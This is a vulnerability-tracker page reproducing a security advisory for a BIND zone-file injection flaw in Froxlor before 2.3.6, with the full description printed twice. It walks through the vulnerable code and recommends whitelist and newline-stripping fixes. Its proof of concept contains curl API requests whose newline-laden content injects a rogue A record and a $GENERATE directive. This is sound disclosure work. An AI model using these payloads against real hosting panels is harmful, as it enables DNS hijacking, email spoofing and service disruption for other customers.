Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
8.5
Froxlor allows attackers to inject malicious DNS records
GHSA-47hf-23pw-3m8c
Summary
A security issue in Froxlor allows an authenticated user to inject malicious DNS records into their domain's zone file. This could lead to unauthorized changes to the domain's DNS settings. To fix this, update Froxlor to the latest version, which includes a patch to sanitize user input and prevent such injections.
What to do
- Update froxlor froxlor to version 2.3.6.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| composer | froxlor | froxlor |
< 2.3.6 Fix: upgrade to 2.3.6
|
Original title
Froxlor has a BIND Zone File Injection via Unsanitized DNS Record Content in DomainZones::add()
Original description
## Summary
`DomainZones::add()` accepts arbitrary DNS record types without a whitelist and does not sanitize newline characters in the `content` field. When a DNS type not covered by the if/elseif validation chain is submitted (e.g., `NAPTR`, `PTR`, `HINFO`), content validation is entirely bypassed. Embedded newline characters in the content survive `trim()` processing, are stored in the database, and are written directly into BIND zone files via `DnsEntry::__toString()`. An authenticated customer can inject arbitrary DNS records and BIND directives (`$INCLUDE`, `$ORIGIN`, `$GENERATE`) into their domain's zone file.
## Details
**Missing type whitelist — `DomainZones.php:93`:**
The `type` parameter is accepted directly from user input with no validation against allowed values:
```php
// lib/Froxlor/Api/Commands/DomainZones.php:93
$type = $this->getParam('type', true, 'A');
```
The if/elseif chain at lines 170-317 validates content only for 13 known types: `A`, `AAAA`, `CAA`, `CNAME`, `DNAME`, `LOC`, `MX`, `NS`, `RP`, `SRV`, `SSHFP`, `TLSA`, `TXT`. Any type not in this list falls through with no content validation at all. There is a `TODO` comment at line 148 acknowledging missing validation:
```php
// TODO regex validate content for invalid characters
```
**Missing newline sanitization — `DomainZones.php:154`:**
The content field only receives `trim()`, which strips leading/trailing whitespace but preserves embedded newline characters:
```php
// lib/Froxlor/Api/Commands/DomainZones.php:154
$content = trim($content);
```
**Unsafe zone file output — `DnsEntry.php:83`:**
`DnsEntry::__toString()` concatenates content directly into zone file format without escaping:
```php
// lib/Froxlor/Dns/DnsEntry.php:83
return $this->record . "\t" . $this->ttl . "\t" . $this->class . "\t" . $this->type . "\t"
. (($this->priority >= 0 && ($this->type == 'MX' || $this->type == 'SRV')) ? $this->priority . "\t" : "")
. $_content . PHP_EOL;
```
Newlines in `$_content` produce new lines in the zone file, each parsed by BIND as an independent resource record or directive.
**Zone file write — `Bind.php:121`:**
```php
// lib/Froxlor/Cron/Dns/Bind.php:121
fwrite($zonefile_handler, $zoneContent . $subzones);
```
The `AntiXSS` filter applied at the API layer (`Api.php:91`) targets HTML/JS XSS vectors and does not strip newline characters. The web UI form restricts types via a dropdown (`formfield.dns_add.php:42-56`), but this is client-side only — the server-side `DomainZones::add()` has no corresponding whitelist.
**Execution flow:**
1. Customer sends API request with `type=NAPTR` and `content` containing `\n`-separated lines
2. `getParam()` returns raw values without sanitization
3. Type `NAPTR` matches none of the if/elseif conditions — no content validation runs
4. `trim($content)` preserves embedded newlines
5. Content is inserted into `domain_dns` table via prepared statement
6. DNS cron creates `DnsEntry` objects from DB records (`Dns.php:297`)
7. `DnsEntry::__toString()` outputs content with embedded newlines into zone format
8. `Bind.php:121` writes zone to disk; BIND loads the file and processes injected lines as records
## PoC
**Step 1: Inject a DNS record with embedded newlines via API**
```bash
curl -s -X POST 'https://froxlor.example.com/api.php' \
-u 'APIKEY:APISECRET' \
-H 'Content-Type: application/json' \
-d '{
"command": "DomainZones.add",
"params": {
"id": 1,
"type": "NAPTR",
"content": "100 10 \"\" \"\" \"\" .\n@ 300 IN A 1.2.3.4\n@ 300 IN NAPTR 100 10 \"\" \"\" \"\" ."
}
}'
```
Expected: HTTP 200 with success response. The record is stored in the database.
**Step 2: Wait for DNS cron to rebuild zones (or trigger manually)**
```bash
# As admin, trigger the DNS rebuild cron
php /var/www/froxlor/scripts/froxlor_master_cronjob.php --force --dns
```
**Step 3: Inspect the generated zone file**
```bash
cat /etc/bind/domains/example.com.zone
```
Expected zone file content includes injected lines:
```
@ 18000 IN NAPTR 100 10 "" "" "" .
@ 300 IN A 1.2.3.4
@ 300 IN NAPTR 100 10 "" "" "" .
```
The line `@ 300 IN A 1.2.3.4` is parsed by BIND as an independent A record pointing the domain to the attacker's IP.
**Step 4: Verify BIND directive injection**
```bash
curl -s -X POST 'https://froxlor.example.com/api.php' \
-u 'APIKEY:APISECRET' \
-H 'Content-Type: application/json' \
-d '{
"command": "DomainZones.add",
"params": {
"id": 1,
"type": "NAPTR",
"content": "100 10 \"\" \"\" \"\" .\n$GENERATE 1-255 $.0.168.192.in-addr.arpa. PTR host-$.example.com."
}
}'
```
This injects a `$GENERATE` directive that creates 255 PTR records.
## Impact
An authenticated customer with DNS editing enabled can:
1. **Inject arbitrary DNS records** bypassing all content validation — including A/AAAA records pointing the domain to attacker-controlled IPs, redirecting legitimate traffic.
2. **Manipulate email authentication** by injecting TXT records to override SPF, DKIM, or DMARC policies, enabling email spoofing for the domain.
3. **Inject BIND server directives** (`$INCLUDE`, `$ORIGIN`, `$GENERATE`) that escape the DNS record context and can attempt to include local server files, alter zone origin, or mass-generate records.
4. **Cause DNS service disruption** by injecting malformed records or conflicting directives that cause the zone file to fail loading, disrupting DNS resolution for all records in the domain.
While this requires an authenticated customer account, DNS editing is a standard feature in shared hosting environments. In a multi-tenant deployment, a malicious customer can abuse this to disrupt the DNS server or inject records that bypass validation controls designed to protect zone integrity.
## Recommended Fix
**1. Add a type whitelist in `DomainZones::add()` (primary fix):**
```php
// lib/Froxlor/Api/Commands/DomainZones.php — after line 93
$type = $this->getParam('type', true, 'A');
$allowed_types = ['A', 'AAAA', 'CAA', 'CNAME', 'DNAME', 'LOC', 'MX', 'NS', 'RP', 'SRV', 'SSHFP', 'TLSA', 'TXT'];
if (!in_array($type, $allowed_types)) {
throw new Exception("DNS record type '" . htmlspecialchars($type) . "' is not supported", 406);
}
```
**2. Strip newline characters from content (defense-in-depth):**
```php
// lib/Froxlor/Api/Commands/DomainZones.php — replace line 154
$content = trim(str_replace(["\r", "\n"], '', $content));
```
**3. Sanitize in `DnsEntry::__toString()` as a belt-and-suspenders measure:**
```php
// lib/Froxlor/Dns/DnsEntry.php — at the start of __toString()
$_content = str_replace(["\r", "\n"], '', $this->content);
```
`DomainZones::add()` accepts arbitrary DNS record types without a whitelist and does not sanitize newline characters in the `content` field. When a DNS type not covered by the if/elseif validation chain is submitted (e.g., `NAPTR`, `PTR`, `HINFO`), content validation is entirely bypassed. Embedded newline characters in the content survive `trim()` processing, are stored in the database, and are written directly into BIND zone files via `DnsEntry::__toString()`. An authenticated customer can inject arbitrary DNS records and BIND directives (`$INCLUDE`, `$ORIGIN`, `$GENERATE`) into their domain's zone file.
## Details
**Missing type whitelist — `DomainZones.php:93`:**
The `type` parameter is accepted directly from user input with no validation against allowed values:
```php
// lib/Froxlor/Api/Commands/DomainZones.php:93
$type = $this->getParam('type', true, 'A');
```
The if/elseif chain at lines 170-317 validates content only for 13 known types: `A`, `AAAA`, `CAA`, `CNAME`, `DNAME`, `LOC`, `MX`, `NS`, `RP`, `SRV`, `SSHFP`, `TLSA`, `TXT`. Any type not in this list falls through with no content validation at all. There is a `TODO` comment at line 148 acknowledging missing validation:
```php
// TODO regex validate content for invalid characters
```
**Missing newline sanitization — `DomainZones.php:154`:**
The content field only receives `trim()`, which strips leading/trailing whitespace but preserves embedded newline characters:
```php
// lib/Froxlor/Api/Commands/DomainZones.php:154
$content = trim($content);
```
**Unsafe zone file output — `DnsEntry.php:83`:**
`DnsEntry::__toString()` concatenates content directly into zone file format without escaping:
```php
// lib/Froxlor/Dns/DnsEntry.php:83
return $this->record . "\t" . $this->ttl . "\t" . $this->class . "\t" . $this->type . "\t"
. (($this->priority >= 0 && ($this->type == 'MX' || $this->type == 'SRV')) ? $this->priority . "\t" : "")
. $_content . PHP_EOL;
```
Newlines in `$_content` produce new lines in the zone file, each parsed by BIND as an independent resource record or directive.
**Zone file write — `Bind.php:121`:**
```php
// lib/Froxlor/Cron/Dns/Bind.php:121
fwrite($zonefile_handler, $zoneContent . $subzones);
```
The `AntiXSS` filter applied at the API layer (`Api.php:91`) targets HTML/JS XSS vectors and does not strip newline characters. The web UI form restricts types via a dropdown (`formfield.dns_add.php:42-56`), but this is client-side only — the server-side `DomainZones::add()` has no corresponding whitelist.
**Execution flow:**
1. Customer sends API request with `type=NAPTR` and `content` containing `\n`-separated lines
2. `getParam()` returns raw values without sanitization
3. Type `NAPTR` matches none of the if/elseif conditions — no content validation runs
4. `trim($content)` preserves embedded newlines
5. Content is inserted into `domain_dns` table via prepared statement
6. DNS cron creates `DnsEntry` objects from DB records (`Dns.php:297`)
7. `DnsEntry::__toString()` outputs content with embedded newlines into zone format
8. `Bind.php:121` writes zone to disk; BIND loads the file and processes injected lines as records
## PoC
**Step 1: Inject a DNS record with embedded newlines via API**
```bash
curl -s -X POST 'https://froxlor.example.com/api.php' \
-u 'APIKEY:APISECRET' \
-H 'Content-Type: application/json' \
-d '{
"command": "DomainZones.add",
"params": {
"id": 1,
"type": "NAPTR",
"content": "100 10 \"\" \"\" \"\" .\n@ 300 IN A 1.2.3.4\n@ 300 IN NAPTR 100 10 \"\" \"\" \"\" ."
}
}'
```
Expected: HTTP 200 with success response. The record is stored in the database.
**Step 2: Wait for DNS cron to rebuild zones (or trigger manually)**
```bash
# As admin, trigger the DNS rebuild cron
php /var/www/froxlor/scripts/froxlor_master_cronjob.php --force --dns
```
**Step 3: Inspect the generated zone file**
```bash
cat /etc/bind/domains/example.com.zone
```
Expected zone file content includes injected lines:
```
@ 18000 IN NAPTR 100 10 "" "" "" .
@ 300 IN A 1.2.3.4
@ 300 IN NAPTR 100 10 "" "" "" .
```
The line `@ 300 IN A 1.2.3.4` is parsed by BIND as an independent A record pointing the domain to the attacker's IP.
**Step 4: Verify BIND directive injection**
```bash
curl -s -X POST 'https://froxlor.example.com/api.php' \
-u 'APIKEY:APISECRET' \
-H 'Content-Type: application/json' \
-d '{
"command": "DomainZones.add",
"params": {
"id": 1,
"type": "NAPTR",
"content": "100 10 \"\" \"\" \"\" .\n$GENERATE 1-255 $.0.168.192.in-addr.arpa. PTR host-$.example.com."
}
}'
```
This injects a `$GENERATE` directive that creates 255 PTR records.
## Impact
An authenticated customer with DNS editing enabled can:
1. **Inject arbitrary DNS records** bypassing all content validation — including A/AAAA records pointing the domain to attacker-controlled IPs, redirecting legitimate traffic.
2. **Manipulate email authentication** by injecting TXT records to override SPF, DKIM, or DMARC policies, enabling email spoofing for the domain.
3. **Inject BIND server directives** (`$INCLUDE`, `$ORIGIN`, `$GENERATE`) that escape the DNS record context and can attempt to include local server files, alter zone origin, or mass-generate records.
4. **Cause DNS service disruption** by injecting malformed records or conflicting directives that cause the zone file to fail loading, disrupting DNS resolution for all records in the domain.
While this requires an authenticated customer account, DNS editing is a standard feature in shared hosting environments. In a multi-tenant deployment, a malicious customer can abuse this to disrupt the DNS server or inject records that bypass validation controls designed to protect zone integrity.
## Recommended Fix
**1. Add a type whitelist in `DomainZones::add()` (primary fix):**
```php
// lib/Froxlor/Api/Commands/DomainZones.php — after line 93
$type = $this->getParam('type', true, 'A');
$allowed_types = ['A', 'AAAA', 'CAA', 'CNAME', 'DNAME', 'LOC', 'MX', 'NS', 'RP', 'SRV', 'SSHFP', 'TLSA', 'TXT'];
if (!in_array($type, $allowed_types)) {
throw new Exception("DNS record type '" . htmlspecialchars($type) . "' is not supported", 406);
}
```
**2. Strip newline characters from content (defense-in-depth):**
```php
// lib/Froxlor/Api/Commands/DomainZones.php — replace line 154
$content = trim(str_replace(["\r", "\n"], '', $content));
```
**3. Sanitize in `DnsEntry::__toString()` as a belt-and-suspenders measure:**
```php
// lib/Froxlor/Dns/DnsEntry.php — at the start of __toString()
$_content = str_replace(["\r", "\n"], '', $this->content);
```
ghsa CVSS3.1
8.5
Vulnerability type
CWE-93
Published: 16 Apr 2026 · Updated: 16 Apr 2026 · First seen: 16 Apr 2026